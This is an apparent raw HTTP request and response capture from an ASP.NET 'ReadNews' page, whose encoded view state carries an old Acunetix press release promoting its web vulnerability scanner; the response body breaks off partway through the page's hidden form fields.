Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAg